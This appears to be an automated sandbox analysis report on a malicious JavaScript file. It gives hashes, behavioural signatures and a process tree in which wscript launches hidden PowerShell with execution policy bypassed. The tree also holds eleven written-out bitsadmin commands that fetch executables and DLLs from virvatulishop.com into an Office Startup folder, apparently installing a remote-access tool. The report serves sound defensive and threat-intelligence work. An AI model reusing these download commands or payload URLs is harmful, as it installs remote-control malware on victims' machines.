Analysis
-
max time kernel
98s -
max time network
105s -
platform
windows7_x64 -
resource
win7-20230705-en -
resource tags
arch:x64arch:x86image:win7-20230705-enlocale:en-usos:windows7-x64system -
submitted
09/07/2023, 19:19
Static task
static1
Behavioral task
behavioral1
Sample
ave6608jsjsjsjsjsjsjsjsjs.js
Resource
win7-20230705-en
Behavioral task
behavioral2
Sample
ave6608jsjsjsjsjsjsjsjsjs.js
Resource
win10v2004-20230703-en
General
-
Target
ave6608jsjsjsjsjsjsjsjsjs.js
-
Size
48KB
-
MD5
493f69ec7712ffa62e867ad4d1782032
-
SHA1
d1793f4c3c1a4edeb6f733357ca8905e6fa384c9
-
SHA256
2b04eb3c0f95ecd1e2a5b74275d82ce3d92f8b153774a59fb7243d39b1b56ae9
-
SHA512
1bddaa72265811bfda643596cb6bc211a07f9687d9f5cc21a10c9cff362da4d8f013328a5e484557f7559fa60434f39087d611dfcf54fe7e8abf4fd2cd836a09
-
SSDEEP
768:mj+yH/l9fdyDlNT4kBPZT3ezR++ag4yuCdIfqMrWVE0rZj4P/T:myyH/ndyDlNT4mPlu+BOuKIfqYgZjyT
Malware Config
Extracted
https://virvatulishop.com/labda.zip
https://virvatulishop.com/files/
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 11 IoCs
pid Process 2444 bitsadmin.exe 3052 bitsadmin.exe 2168 bitsadmin.exe 2772 bitsadmin.exe 2944 bitsadmin.exe 1092 bitsadmin.exe 2696 bitsadmin.exe 2200 bitsadmin.exe 2188 bitsadmin.exe 1380 bitsadmin.exe 2292 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3000 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 3060 wrote to memory of 3000 3060 wscript.exe 27 PID 3060 wrote to memory of 3000 3060 wscript.exe 27 PID 3060 wrote to memory of 3000 3060 wscript.exe 27 PID 3000 wrote to memory of 3052 3000 powershell.exe 29 PID 3000 wrote to memory of 3052 3000 powershell.exe 29 PID 3000 wrote to memory of 3052 3000 powershell.exe 29 PID 3000 wrote to memory of 2200 3000 powershell.exe 30 PID 3000 wrote to memory of 2200 3000 powershell.exe 30 PID 3000 wrote to memory of 2200 3000 powershell.exe 30 PID 3000 wrote to memory of 2168 3000 powershell.exe 31 PID 3000 wrote to memory of 2168 3000 powershell.exe 31 PID 3000 wrote to memory of 2168 3000 powershell.exe 31 PID 3000 wrote to memory of 2772 3000 powershell.exe 32 PID 3000 wrote to memory of 2772 3000 powershell.exe 32 PID 3000 wrote to memory of 2772 3000 powershell.exe 32 PID 3000 wrote to memory of 2944 3000 powershell.exe 33 PID 3000 wrote to memory of 2944 3000 powershell.exe 33 PID 3000 wrote to memory of 2944 3000 powershell.exe 33 PID 3000 wrote to memory of 2188 3000 powershell.exe 34 PID 3000 wrote to memory of 2188 3000 powershell.exe 34 PID 3000 wrote to memory of 2188 3000 powershell.exe 34 PID 3000 wrote to memory of 1380 3000 powershell.exe 35 PID 3000 wrote to memory of 1380 3000 powershell.exe 35 PID 3000 wrote to memory of 1380 3000 powershell.exe 35 PID 3000 wrote to memory of 2292 3000 powershell.exe 36 PID 3000 wrote to memory of 2292 3000 powershell.exe 36 PID 3000 wrote to memory of 2292 3000 powershell.exe 36 PID 3000 wrote to memory of 1092 3000 powershell.exe 37 PID 3000 wrote to memory of 1092 3000 powershell.exe 37 PID 3000 wrote to memory of 1092 3000 powershell.exe 37 PID 3000 wrote to memory of 2696 3000 powershell.exe 38 PID 3000 wrote to memory of 2696 3000 powershell.exe 38 PID 3000 wrote to memory of 2696 3000 powershell.exe 38 PID 3000 wrote to memory of 2444 3000 powershell.exe 39 PID 3000 wrote to memory of 2444 3000 powershell.exe 39 PID 3000 wrote to memory of 2444 3000 powershell.exe 39
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll3⤵
- Download via BitsAdmin
PID:3052
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe3⤵
- Download via BitsAdmin
PID:2200
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini3⤵
- Download via BitsAdmin
PID:2168
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL3⤵
- Download via BitsAdmin
PID:2772
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll3⤵
- Download via BitsAdmin
PID:2944
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf3⤵
- Download via BitsAdmin
PID:2188
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/NSM.LIC C:\Users\Admin\AppData\RoamingOfficeStartupNSM.LIC3⤵
- Download via BitsAdmin
PID:1380
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/pcicapi.dll C:\Users\Admin\AppData\RoamingOfficeStartuppcicapi.dll3⤵
- Download via BitsAdmin
PID:2292
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICHEK.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICHEK.DLL3⤵
- Download via BitsAdmin
PID:1092
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICL32.DLL3⤵
- Download via BitsAdmin
PID:2696
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/remcmdstub.exe C:\Users\Admin\AppData\RoamingOfficeStartupremcmdstub.exe3⤵
- Download via BitsAdmin
PID:2444
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d8d4beafe295f925cf1e7c73667b99cb
SHA1dc73efce5921033d72bbb09713b347f0e5b6358f
SHA25682d78c24842eda98e42ff73b25fd97dd52ed9046c4c5e5200bb2ad760c18f9c3
SHA512dfe68905caed73d5d61090598bab5db93e432098e37bf815243b7c031fd4403c3a1fbeab314edc22f466a22de521f8a2fa5bbf27356a958aafd56f2fa9feef21